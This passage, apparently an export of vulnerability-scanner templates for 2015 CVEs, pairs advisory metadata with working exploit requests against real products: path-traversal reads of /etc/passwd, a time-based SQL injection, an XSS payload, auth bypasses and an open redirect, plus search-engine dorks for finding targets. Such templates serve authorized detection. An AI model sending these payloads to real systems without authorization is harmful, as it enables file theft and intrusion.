http://www.kb.cert.org/vuls/id/919604\n - https://nvd.nist.gov/vuln/detail/CVE-2015-2863\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2015-2863\n cwe-id: CWE-601\n epss-score: 0.00626\n epss-percentile: 0.76747\n cpe: cpe:2.3:a:kaseya:virtual_system_administrator:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: kaseya\n product: virtual_system_administrator\n tags: cve2015,cve,redirect,kaseya\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/inc/supportLoad.asp?urlToLoad=http://oast.me'\n - '{{BaseURL}}/vsaPres/Web20/core/LocalProxy.ashx?url=http://oast.me'\n\n stop-at-first-match: true\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me\\/?(\\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1\n# digest: 4a0a00473045022033fc40b6ad2baca8ef5a0faf48a297f8e14cac8e720047cf1fe5e96fcc10f293022100cf0c442e4cdd4914c177d6a54eb4d2115d579e4fe66231ee6dab3b91118d424a:922c64590222798bb761d5b6d8e72950", "hash": "1c3f3106b0390e6318cd31dc783c817c", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f4c" }, "name": "CVE-2015-2996.yaml", "content": "id: CVE-2015-2996\n\ninfo:\n name: SysAid Help Desk <15.2 - Local File Inclusion\n author: 0x_Akoko\n severity: high\n description: |\n SysAid Help Desk before 15.2 contains multiple local file inclusion vulnerabilities which can allow remote attackers to read arbitrary files via .. (dot dot) in the fileName parameter of getGfiUpgradeFile or cause a denial of service (CPU and memory consumption) via .. (dot dot) in the fileName parameter of calculateRdsFileChecksum.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server.\n remediation: |\n Upgrade SysAid Help Desk to version 15.2 or later to mitigate the vulnerability.\n reference:\n - https://seclists.org/fulldisclosure/2015/Jun/8\n - https://www.sysaid.com/blog/entry/sysaid-15-2-your-voice-your-service-desk\n - http://seclists.org/fulldisclosure/2015/Jun/8\n - https://nvd.nist.gov/vuln/detail/CVE-2015-2996\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:C\n cvss-score: 8.5\n cve-id: CVE-2015-2996\n cwe-id: CWE-22\n epss-score: 0.77754\n epss-percentile: 0.98153\n cpe: cpe:2.3:a:sysaid:sysaid:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: sysaid\n product: sysaid\n shodan-query: http.favicon.hash:1540720428\n tags: cve2015,cve,sysaid,lfi,seclists\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/sysaid/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd\"\n - \"{{BaseURL}}/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd\"\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220312369a2b289aed97447a2b6f30dc5d2b433cdaaadac8006d3c5cdac9eac8bcb022100c6c5b7d290b6e9c305b740862e6371ed4874567dc834c7705e73d0655613aa73:922c64590222798bb761d5b6d8e72950", "hash": "6b1f2aa1635a51953aa5d1605b940880", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f4d" }, "name": "CVE-2015-3035.yaml", "content": "id: CVE-2015-3035\n\ninfo:\n name: TP-LINK - Local File Inclusion\n author: 0x_Akoko\n severity: high\n description: |\n TP-LINK is susceptible to local file inclusion in these products: Archer C5 (1.2) with firmware before 150317, Archer C7 (2.0) with firmware before 150304, and C8 (1.0) with firmware before 150316, Archer C9 (1.0), TL-WDR3500 (1.0), TL-WDR3600 (1.0), and TL-WDR4300 (1.0) with firmware before 150302, TL-WR740N (5.0) and TL-WR741ND (5.0) with firmware before 150312, and TL-WR841N (9.0), TL-WR841N (10.0), TL-WR841ND (9.0), and TL-WR841ND (10.0) with firmware before 150310. Because of insufficient input validation, arbitrary local files can be disclosed. Files that include passwords and other sensitive information can be accessed.\n impact: |\n An attacker can read sensitive files on the TP-LINK router, potentially leading to unauthorized access or disclosure of sensitive information.\n remediation: |\n Apply the latest firmware update provided by TP-LINK to fix the local file inclusion vulnerability.\n reference:\n - https://seclists.org/fulldisclosure/2015/Apr/26\n - https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20150410-0_TP-Link_Unauthenticated_local_file_disclosure_vulnerability_v10.txt\n - http://www.tp-link.com/en/download/TL-WDR3600_V1.html#Firmware\n - https://nvd.nist.gov/vuln/detail/CVE-2015-3035\n - http://www.tp-link.com/en/download/Archer-C5_V1.20.html#Firmware\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:N/A:N\n cvss-score: 7.8\n cve-id: CVE-2015-3035\n cwe-id: CWE-22\n epss-score: 0.58993\n epss-percentile: 0.97444\n cpe: cpe:2.3:o:tp-link:tl-wr841n_\\(9.0\\)_firmware:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: tp-link\n product: tl-wr841n_\\(9.0\\)_firmware\n shodan-query: http.title:\"TP-LINK\"\n tags: cve2015,cve,router,lfi,seclists,tplink,kev,tp-link\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/login/../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502204768364244d39e7174ab745661a9b31b5c4a63196ef946111d7805224675b70b022100ffd194906b2d3558567d2e6ac11fa657016da8d600e7908912b66ece312d2f2f:922c64590222798bb761d5b6d8e72950", "hash": "1bfcf282606ae7f8711963f1ab9b38fa", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f4e" }, "name": "CVE-2015-3224.yaml", "content": "id: CVE-2015-3224\n\ninfo:\n name: Ruby on Rails Web Console - Remote Code Execution\n author: pdteam\n severity: medium\n description: Ruby on Rails Web Console before 2.1.3, as used with Ruby on Rails 3.x and 4.x, does not properly restrict the use of X-Forwarded-For headers in determining a client's IP address, which allows remote attackers to bypass the whitelisted_ips protection mechanism via a crafted request to request.rb.\n impact: |\n Remote code execution can lead to unauthorized access, data breaches, and complete compromise of the affected system.\n remediation: |\n Upgrade to a patched version of Ruby on Rails or disable the Web Console feature.\n reference:\n - https://www.metahackers.pro/rails-web-console-v2-whitelist-bypass-code-exec/\n - https://www.jomar.fr/posts/2022/basic_recon_to_rce_ii/\n - https://hackerone.com/reports/44513\n - https://nvd.nist.gov/vuln/detail/CVE-2015-3224\n - http://lists.fedoraproject.org/pipermail/package-announce/2015-June/160881.html\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2015-3224\n cwe-id: CWE-284\n epss-score: 0.92904\n epss-percentile: 0.98975\n cpe: cpe:2.3:a:rubyonrails:web_console:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: rubyonrails\n product: web_console\n tags: cve2015,cve,ruby,hackerone,rce,rails,intrusive,rubyonrails\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/{{randstr}}\"\n\n headers:\n X-Forwarded-For: ::1\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"Rails.root:\"\n - \"Action Controller: Exception caught\"\n condition: and\n\n - type: word\n part: response\n words:\n - X-Web-Console-Session-Id\n - data-remote-path=\n - data-session-id=\n case-insensitive: true\n condition: or\n# digest: 4a0a00473045022100c4b2125a78ee523a116fd826ab60375b59dd4e7783faf87bb57fdb018ec7183702203cd169073ca993580b1ad5b798b29f12ea43ea85d77a1f8eb1fce8095e0a0b34:922c64590222798bb761d5b6d8e72950", "hash": "af4faab39db80a9342d0a2331bf69b26", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f4f" }, "name": "CVE-2015-3337.yaml", "content": "id: CVE-2015-3337\n\ninfo:\n name: Elasticsearch - Local File Inclusion\n author: pdteam\n severity: medium\n description: Elasticsearch before 1.4.5 and 1.5.x before 1.5.2 allows remote attackers to read arbitrary files via unspecified vectors when a site plugin is enabled.\n impact: |\n An attacker can exploit this vulnerability to read sensitive files on the server.\n remediation: |\n Upgrade to a patched version of Elasticsearch or apply the necessary security patches.\n reference:\n - https://www.exploit-db.com/exploits/37054/\n - https://www.elastic.co/community/security\n - http://www.debian.org/security/2015/dsa-3241\n - https://nvd.nist.gov/vuln/detail/CVE-2015-3337\n - http://packetstormsecurity.com/files/131646/Elasticsearch-Directory-Traversal.html\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N\n cvss-score: 4.3\n cve-id: CVE-2015-3337\n cwe-id: CWE-22\n epss-score: 0.96447\n epss-percentile: 0.9948\n cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: elasticsearch\n product: elasticsearch\n tags: cve2015,cve,packetstorm,edb,elastic,lfi,elasticsearch,plugin\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/_plugin/head/../../../../../../../../../../../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502206b4169ea4037924ebdc00d3cc7130c430dcd5ec43759ee09a9f082345b65f7dd022100c41635084e4f84a3e64265efc16c730e5b4725552238f864784bae130304e1f8:922c64590222798bb761d5b6d8e72950", "hash": "ec672aaf99ddf62cbd881b23a7159fc2", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f50" }, "name": "CVE-2015-3648.yaml", "content": "id: CVE-2015-3648\n\ninfo:\n name: ResourceSpace - Local File inclusion\n author: pikpikcu\n severity: high\n description: ResourceSpace is prone to a local file-inclusion vulnerability because it fails to sufficiently sanitize user-supplied input.\n impact: |\n An attacker can exploit this vulnerability to read sensitive files, execute arbitrary code, or launch further attacks.\n remediation: |\n Upgrade to the latest version of ResourceSpace to fix the local file inclusion vulnerability.\n reference:\n - https://vulners.com/cve/CVE-2015-3648/\n - http://svn.montala.com/websvn/revision.php?repname=ResourceSpace&path=%2F&rev=6640&peg=6738\n - http://packetstormsecurity.com/files/132142/ResourceSpace-7.1.6513-Local-File-Inclusion.html\n - https://nvd.nist.gov/vuln/detail/CVE-2015-3648\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2015-3648\n cwe-id: CWE-22\n epss-score: 0.02644\n epss-percentile: 0.90124\n cpe: cpe:2.3:a:montala:resourcespace:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: montala\n product: resourcespace\n tags: cve2015,cve,lfi,resourcespace,packetstorm,montala\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220648060aa6f48efed100d6c3af1a59ebd765dd1e5e395decdf098e3b2e8748309022065fdb6859c50c278bb5ead61bdc761c9fe3d5c922cdf04874d98784fe719eeb9:922c64590222798bb761d5b6d8e72950", "hash": "bdd5c1464b350334ef2c467d80b3dc6d", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f51" }, "name": "CVE-2015-3897.yaml", "content": "id: CVE-2015-3897\n\ninfo:\n name: Bonita BPM Portal <6.5.3 - Local File Inclusion\n author: 0x_Akoko\n severity: medium\n description: Bonita BPM Portal before 6.5.3 allows remote attackers to read arbitrary files via a .. (dot dot) in the theme parameter and a file path in the location parameter to bonita/portal/themeResource.\n impact: |\n An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.\n remediation: |\n Upgrade Bonita BPM Portal to version 6.5.3 or later to mitigate the vulnerability.\n reference:\n - https://packetstormsecurity.com/files/132237/Bonita-BPM-6.5.1-Directory-Traversal-Open-Redirect.html\n - https://www.bonitasoft.com/\n - https://nvd.nist.gov/vuln/detail/CVE-2015-3897\n - https://www.htbridge.com/advisory/HTB23259\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2015-3897\n cwe-id: CWE-22\n epss-score: 0.83225\n epss-percentile: 0.98353\n cpe: cpe:2.3:a:bonitasoft:bonita_bpm_portal:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: bonitasoft\n product: bonita_bpm_portal\n tags: cve2015,cve,unauth,packetstorm,bonita,lfi,bonitasoft\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=etc/passwd\"\n - \"{{BaseURL}}/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=Windows/win.ini\"\n\n stop-at-first-match: true\n\n matchers-condition: or\n matchers:\n - type: word\n part: body\n words:\n - \"bit app support\"\n - \"fonts\"\n - \"extensions\"\n condition: and\n\n - type: regex\n regex:\n - \"root:[x*]:0:0:\"\n# digest: 4b0a00483046022100811332ca629cdfca6539bfdc50c6dd662a8522787a0bac631ecd72efe29ffd1b022100a97dd795f5dc0cfa69a7ecc65c1707b84fdf96eba9cbaeacde39a1356bba27f8:922c64590222798bb761d5b6d8e72950", "hash": "d0c8182e4521dbb344f10e41af46391d", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f52" }, "name": "CVE-2015-4050.yaml", "content": "id: CVE-2015-4050\n\ninfo:\n name: Symfony - Authentication Bypass\n author: ELSFA7110,meme-lord\n severity: medium\n description: Symfony 2.3.19 through 2.3.28, 2.4.9 through 2.4.10, 2.5.4 through 2.5.11, and 2.6.0 through 2.6.7, when ESI or SSI support enabled, does not check if the _controller attribute is set, which allows remote attackers to bypass URL signing and security rules by including (1) no hash or (2) an invalid hash in a request to /_fragment in the HttpKernel component.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to bypass authentication and gain unauthorized access to the affected system.\n remediation: |\n Apply the latest security patches or upgrade to a non-vulnerable version of Symfony.\n reference:\n - https://symfony.com/blog/cve-2015-4050-esi-unauthorized-access\n - http://symfony.com/blog/cve-2015-4050-esi-unauthorized-access\n - http://www.debian.org/security/2015/dsa-3276\n - https://nvd.nist.gov/vuln/detail/CVE-2015-4050\n - http://lists.fedoraproject.org/pipermail/package-announce/2015-June/159513.html\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2015-4050\n cwe-id: CWE-284\n epss-score: 0.00598\n epss-percentile: 0.77957\n cpe: cpe:2.3:a:sensiolabs:symfony:2.3.19:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: sensiolabs\n product: symfony\n tags: cve2015,cve,symfony,rce,sensiolabs\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/_fragment?_path=_controller=phpcredits&flag=-1\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"PHP Credits\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100d90f99fa4301493aeb28357b0ea4b46a40cbec4e3b675583644ef665e08e35d802206e03ca08917179f4e6306da4db59165d5a748a0c444859583cc72335a9d4c673:922c64590222798bb761d5b6d8e72950", "hash": "804950053eedefd2ca16c90fad51bf21", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f53" }, "name": "CVE-2015-4062.yaml", "content": "id: CVE-2015-4062\n\ninfo:\n name: WordPress NewStatPress 0.9.8 - SQL Injection\n author: r3Y3r53\n severity: medium\n description: |\n WordPress NewStatPress 0.9.8 plugin contains a SQL injection vulnerability in includes/nsp_search.php. A remote authenticated user can execute arbitrary SQL commands via the where1 parameter in the nsp_search page to wp-admin/admin.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.\n remediation: |\n Update to plugin version 0.9.9 or latest.\n reference:\n - https://packetstormsecurity.com/files/132038/\n - https://wordpress.org/plugins/newstatpress\n - http://packetstormsecurity.com/files/132038/WordPress-NewStatPress-0.9.8-Cross-Site-Scripting-SQL-Injection.html\n - https://nvd.nist.gov/vuln/detail/CVE-2015-4062\n - https://wordpress.org/plugins/newstatpress/changelog/\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:S/C:P/I:P/A:P\n cvss-score: 6.5\n cve-id: CVE-2015-4062\n cwe-id: CWE-89\n epss-score: 0.03919\n epss-percentile: 0.91099\n cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: newstatpress_project\n product: newstatpress\n framework: wordpress\n tags: cve2015,cve,authenticated,sqli,wp-plugin,newstatpress,packetstorm,wordpress,wp,newstatpress_project\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?where1=1+AND+(SELECT+3066+FROM+(SELECT(SLEEP(6)))CEHy)&limitquery=1&searchsubmit=Buscar&page=nsp_search HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code == 200'\n - 'contains(body_2, \"newstatpress_page_nsp_search\")'\n condition: and\n# digest: 4b0a00483046022100cb6d01be28991515ac71dda8242c7249446951e8cb1a66461263462841119495022100ef9dc6f15e3e424c0eaa861f7e49c07486bda3c3ce0c48b8dc6ff5ffe611a6f5:922c64590222798bb761d5b6d8e72950", "hash": "cc5d553f1a98f57d2c6bd373acbfce30", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f54" }, "name": "CVE-2015-4063.yaml", "content": "id: CVE-2015-4063\n\ninfo:\n name: NewStatPress <0.9.9 - Cross-Site Scripting\n author: r3Y3r53\n severity: low\n description: |\n WordPress NewStatPress plugin before 0.9.9 contains a cross-site scripting vulnerability in includes/nsp_search.php. The plugin allows remote authenticated users to inject arbitrary web script or HTML via the where1 parameter in the nsp_search page to wp-admin/admin.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.\n remediation: Update to plugin version 0.9.9 or latest.\n reference:\n - https://packetstormsecurity.com/files/132038/\n - https://wordpress.org/plugins/newstatpress/\n - http://packetstormsecurity.com/files/132038/WordPress-NewStatPress-0.9.8-Cross-Site-Scripting-SQL-Injection.html\n - https://nvd.nist.gov/vuln/detail/CVE-2015-4063\n - https://wordpress.org/plugins/newstatpress/changelog/\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:S/C:N/I:P/A:N\n cvss-score: 3.5\n cve-id: CVE-2015-4063\n cwe-id: CWE-79\n epss-score: 0.04016\n epss-percentile: 0.91867\n cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: newstatpress_project\n product: newstatpress\n framework: wordpress\n tags: cve2015,cve,xss,wordpress,wp-plugin,wp,newstatpress,packetstorm,newstatpress_project\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log=admin&pwd=admin123&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?where1=&searchsubmit=Buscar&page=nsp_search HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - \"contains(body_2, '') && contains(body_2, 'newstatpress')\"\n condition: and\n# digest: 4a0a00473045022100b0f2e30065dca077f71d175c0be5c923af94f47acfb9c5706268811d87855d9d0220589926117e2ba9dd25f96017a9e5ad2b082115c853eddbc7805ddf2ae30ab9b8:922c64590222798bb761d5b6d8e72950", "hash": "aea9464ab25fa00cb83f5c9fab55a278", "level": 3, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f55" }, "name": "CVE-2015-4074.yaml", "content": "id: CVE-2015-4074\n\ninfo:\n name: Joomla! Helpdesk Pro plugin <1.4.0 - Local File Inclusion\n author: 0x_Akoko\n severity: high\n description: Directory traversal vulnerability in the Helpdesk Pro plugin before 1.4.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the filename parameter in a ticket.download_attachment task.\n impact: |\n An attacker can exploit this vulnerability to read sensitive files on the server.\n remediation: |\n Upgrade to Joomla! Helpdesk Pro plugin version 1.4.0 or later to fix the local file inclusion vulnerability.\n reference:\n - https://packetstormsecurity.com/files/132766/Joomla-Helpdesk-Pro-XSS-File-Disclosure-SQL-Injection.html\n - https://www.exploit-db.com/exploits/37666/\n - https://nvd.nist.gov/vuln/detail/CVE-2015-4074\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4074\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2015-4074\n cwe-id: CWE-22\n epss-score: 0.00598\n epss-percentile: 0.77961\n cpe: cpe:2.3:a:helpdesk_pro_project:helpdesk_pro:*:*:*:*:*:joomla\\!:*:*\n metadata:\n max-request: 1\n vendor: helpdesk_pro_project\n product: helpdesk_pro\n framework: joomla\\!\n tags: cve2015,cve,lfi,packetstorm,edb,joomla,plugin,helpdesk_pro_project,joomla\\!,xss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/?option=com_helpdeskpro&task=ticket.download_attachment&filename=/../../../../../../../../../../../../etc/passwd&original_filename=AnyFileName.exe\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502202842932433472fb23fa32b0fb531bf216b2816d459a655b2302110a3b5e191d9022100bcc4cc9601e498334a410e1ff13dfec9aa1aca4ebca8ad7b044b4709e3ec4860:922c64590222798bb761d5b6d8e72950", "hash": "a149c4f9a58229403330350c26af7803", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f56" }, "name": "CVE-2015-4127.yaml", "content": "id: CVE-2015-4127\n\ninfo:\n name: WordPress Church Admin <0.810 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: |\n WordPress Church Admin plugin before 0.810 allows remote attackers to inject arbitrary web script or HTML via the address parameter via index.php/2015/05/21/church_admin-registration-form/.\n impact: |\n Allows attackers to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions.\n remediation: |\n Update to the latest version of the WordPress Church Admin plugin (0.810 or higher) to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/37112\n - https://wpscan.com/vulnerability/2d5b3707-f58a-4154-93cb-93f7058e3408\n - https://wordpress.org/plugins/church-admin/changelog/\n - https://nvd.nist.gov/vuln/detail/CVE-2015-4127\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2015-4127\n cwe-id: CWE-79\n epss-score: 0.0034\n epss-percentile: 0.68397\n cpe: cpe:2.3:a:church_admin_project:church_admin:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: church_admin_project\n product: church_admin\n framework: wordpress\n tags: cve2015,cve,wp-plugin,wp,edb,wpscan,wordpress,xss,church_admin_project\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/church-admin/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Church Admin ='\n\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100c5529d0f19b2c265d2588980579e3d4b1321312560cec46437ddd2fab8714242022100b4612385d3dbaaad79be28b6f61cd619e9c90dd9b05c6b83e718bd7dbece46b4:922c64590222798bb761d5b6d8e72950", "hash": "887fb05dafe86d4a4435f5ef9fcefe13", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f57" }, "name": "CVE-2015-4414.yaml", "content": "id: CVE-2015-4414\n\ninfo:\n name: WordPress SE HTML5 Album Audio Player 1.1.0 - Directory Traversal\n author: daffainfo\n severity: medium\n description: WordPress SE HTML5 Album Audio Player 1.1.0 contains a directory traversal vulnerability in download_audio.php that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.\n impact: |\n An attacker can exploit this vulnerability to access sensitive files on the server, potentially leading to unauthorized disclosure of sensitive information.\n remediation: |\n Update to the latest version of WordPress SE HTML5 Album Audio Player or apply the vendor-supplied patch to fix the directory traversal vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/37274\n - https://nvd.nist.gov/vuln/detail/CVE-2015-4414\n - https://www.exploit-db.com/exploits/37274/\n - http://packetstormsecurity.com/files/132266/WordPress-SE-HTML5-Album-Audio-Player-1.1.0-Directory-Traversal.html\n - https://wpvulndb.com/vulnerabilities/8032\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2015-4414\n cwe-id: CWE-22\n epss-score: 0.12486\n epss-percentile: 0.95299\n cpe: cpe:2.3:a:se_html5_album_audio_player_project:se_html5_album_audio_player:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: se_html5_album_audio_player_project\n product: se_html5_album_audio_player\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/se-html5-album-audio-player\"\n tags: cve2015,cve,wordpress,wp-plugin,lfi,edb,packetstorm,se_html5_album_audio_player_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100a1e96510bf46f0ef10d550a44e8008d7c94bdc586bca89d6326af5877a9aa00e0221009f73f1b77fe426015fe533efc27ee70158689c68e345cbcf26c1e772fdd9d695:922c64590222798bb761d5b6d8e72950", "hash": "050dfcd50a18145e354e8f2588355514", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f58" }, "name": "CVE-2015-4632.yaml", "content": "id: CVE-2015-4632\n\ninfo:\n name: Koha 3.20.1 - Directory Traversal\n author: daffainfo\n severity: high\n description: Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the template_path parameter to (1) svc/virtualshelves/search or (2) svc/members/search.\n impact: |\n An attacker can read or modify sensitive files, potentially leading to unauthorized access, data leakage, or system compromise.\n remediation: |\n Upgrade to a patched version of Koha or apply the necessary security patches to fix the directory traversal vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/37388\n - https://nvd.nist.gov/vuln/detail/CVE-2015-4632\n - https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/\n - https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408\n - https://koha-community.org/koha-3-14-16-released/\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2015-4632\n cwe-id: CWE-22\n epss-score: 0.02297\n epss-percentile: 0.88584\n cpe: cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: koha\n product: koha\n tags: cve2015,cve,lfi,edb,koha\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 